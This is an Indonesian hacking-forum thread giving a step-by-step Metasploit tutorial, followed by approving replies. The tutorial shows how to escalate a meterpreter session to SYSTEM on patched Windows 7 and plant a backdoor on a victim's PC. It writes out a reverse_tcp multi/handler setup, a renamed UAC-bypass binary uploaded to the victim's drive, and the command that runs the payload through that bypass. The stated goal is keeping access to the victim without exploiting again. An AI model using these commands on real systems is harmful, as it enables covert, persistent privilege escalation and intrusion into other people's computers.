[Fixed] Mengatasi upload denied pada meterpreter ++ dump
#1
[Image: images.jpg]

Disini saya harap kalian sudah masuk sesi meterpreter
dan apa yang kita lakukan setelah dapat sesi meterpreter
banyak cara yang kita lakukan ketika kita berada pada sesi meterpreter ini
hmmm...yup kita akan mengupload backdoor agar kita bisa masuk ke pc korban lagi tanpa mengexploitnya

tapi kendala masih saja ada yaitu tidak bisa upload backdoor kita


percobaan dengan menggunakan 2 laptop 1 pc

1 pc = menggunakan single boot dengan os backtrack 5 r3 (ATTACKER)
1 laptop = menggunakan single boot windows 7
1 laptop = menggunakan triple boot backtrack 5 r3 , xp sp3 , windows 7 SP 1

dengan keterangan error access denied atau kita ditolak masuk ke system tersebut

[Image: Selection_001.png]

ok langsung saja kita mencoba masuk systemnya apabila belum di patch tu windows nya

disini saya harap sudah ada pada meterpreter
lalu ketikkan perintah

getsystem


untuk masuk kesistem

dan coba upload kan lagi backdoor kalian

[Image: Selection_002.png]



lalu kita coba test pada windows 7 yang sudah di patch

DAN JIKA WINDOWS 7 SUDAH DI PATCH alias korban memakai windows 7 sp1
maka ketika kita mau mendapatkan system dengan getsystem maka access denied

[Image: Selection_001.png]

dan muncul pesan error pada windows korban
hmmm berarti windosnya bener2 sudah di patch ni

[Image: Capture.PNG]


disini kita harus sudah masuk meterpreter dulu sebelum membypass nya
dan cara untuk mengakalinya dengan menggunakan tehnik bypass.exe yang ada pada folder /opt/metasploit/msf3/data/post

[b]buka lagi [/b]msfconsole
lalu buat exploit multi handler


use exploit/multi/handler
set payload windows meterpreter/reverse_tcp
set lhost 192.168.1.73
exploit


[Image: Selection_017.png]

lalu bikin payload multi handler dan simpan pada desktop beri nama 4444.exe

[Image: Selection_016.png]


[Image: Selection_016.png]


buka terminal baru masukkan perintah

cd /opt/metasploit/msf3/data/post



disana kita kana melihat bypass nya

[Image: Selection_002.png]

dan sekarang copy bypass nya pada desktop dan rename nya disini korban menggunakan 32bit dan saya rename bypassnya dengan nama xbuster404.exe

[Image: Selection_014.png]

nah hasilnya kita punya 2 file di desktop

[Image: Selection_020.png]


setelah itu kita cari dulu hasil exploitnya yang mengizinkan kita masuk pada session meterpreter yang dulu
dengan perintah pwd

[Image: Selection_018.png]

ternyata exploit kita masuk pada d:

sekarang mulailah kita upload bypass yang telah kita rename tadi di desktop

upload /root/Desktop/xbuster404.exe D:\

[Image: Selection_019.png]

lalu upload juga payload yang telah kita buat sebelumnya

upload /root/Desktop/4444.exe D:\


[Image: Selection_021.png]

sekarang kita masuk cmd korban untuk mengesekusinya menggunkan perintah


shell


lalu eksekusi payload dibawah bypass dengan perintah

xbuster404.exe elevate /c D:\4444.exe

[Image: Selection_022.png]


dan beralihlah pada console kedua (msfconsole yang baru dibuat tadi) dan coba untuk dapatkan systemnya dengan perintah

getsystem

[Image: Selection_023.png]

woowwww work
:>

#2
nice tutor, cukup jelas menurut ane penjelasannya

keep share bro, thanks Smile

#3
Nice Share bro Big Grin >> Lengkap
<<Hacker : 1995 << My Inspiration | yak yak yak

#4
Mantap ne om, barusaja ane nemu maslah kayak gituan,
Alhasil udah teratasi ne
:-bd:-bd:-bd:-bd:
"Kesadaran Beragama, Berilmu, Bermasyarakat, Berbangsa, Bernegara, dan Berorganisasi"






Users browsing this thread: 1 Guest(s)